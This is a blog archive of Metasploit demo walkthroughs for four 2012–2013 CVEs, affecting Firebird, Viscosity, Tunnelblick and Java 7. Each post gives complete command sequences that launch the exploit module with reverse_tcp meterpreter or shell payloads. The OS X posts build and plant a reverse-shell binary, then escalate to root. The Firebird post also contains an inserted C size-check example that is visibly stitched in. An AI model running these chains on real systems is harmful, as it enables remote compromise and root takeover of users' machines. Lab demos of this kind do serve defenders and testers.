Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Spencer McIntyre on 2013-01-31
Vulnerability reported to the vendor on 2013-03-05
Coordinated public release of the vulnerability on 2013-03-08
Metasploit PoC provided on 2013-03-08

PoC provided by :

Spencer McIntyre

Reference(s) :

CVE-2013-2492
CORE-4058

Affected version(s) :

Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2

Tested on Windows XP Pro SP3 with :

FireBird 2.5.2.26539

Description :

This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent that overwrites a pointer, allowing the attacker to control where data is read from. Shortly after the controlled read, the pointer is called, resulting in code execution. The vulnerability lies in the handling of a group number extracted from the CNCT information, which is sent by the client and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows execution of the ROP chain, which is ultimately used to call VirtualAlloc and bypass DEP.
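The root cause described above is a client-chosen length used to copy into a fixed-size field. The following is an added example of the size check that closes this bug class; it is not Firebird's code or the Metasploit module, and the tag/length/value layout, the `TAG_GROUP` value and the function name `parse_group` are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TAG_GROUP 2   /* hypothetical tag value, not taken from Firebird */

/* Walk a client-supplied list of (tag, length, value) items and extract the
 * group number. Returns 0 on success, -1 on a malformed list. */
int parse_group(const uint8_t *buf, size_t len, uint32_t *gid)
{
    size_t off = 0;
    *gid = 0;
    while (off < len) {
        if (len - off < 2)
            return -1;                 /* truncated tag/length header */
        uint8_t tag = buf[off];
        size_t vlen = buf[off + 1];    /* one byte: client picks 0..255 */
        off += 2;
        if (vlen > len - off)
            return -1;                 /* value runs past end of packet */
        if (tag == TAG_GROUP) {
            /* The size check this bug class lacks: the destination is 4 bytes */
            if (vlen > sizeof(*gid))
                return -1;
            uint32_t tmp = 0;
            memcpy(&tmp, buf + off, vlen);
            *gid = tmp;
        }
        off += vlen;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: group item declaring 8 bytes for a 4-byte field */
    const uint8_t oversized[] = { TAG_GROUP, 8, 1, 2, 3, 4, 5, 6, 7, 8 };
    uint32_t gid;
    printf("oversized group item -> %d\n",
           parse_group(oversized, sizeof oversized, &gid));
    return 0;
}
```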

Commands :

use exploit/windows/misc/fb_cnct_group
set RHOST 192.168.178.22
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Vulnerability corrected by the vendor on 2012-08-30
Metasploit PoC provided on 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-4284
OSVDB-84709

Affected version(s) :

Viscosity 1.4.1 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Viscosity 1.4.1

Description :

This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where insufficient validation of path names allows execution of arbitrary Python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.

Commands :

Create an OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload to the victim OS X 10.7.5 host

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_viscosity
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Metasploit PoC provided on 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and previous

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.

Commands :

Create an OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload to the victim OS X 10.7.5 host

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations on 2013-01-18
Vulnerability patched by the vendor on 2013-02-01
Vulnerability discovered being exploited in the wild by kafeine and EKwatcher on 2013-02-18
Metasploit PoC provided on 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo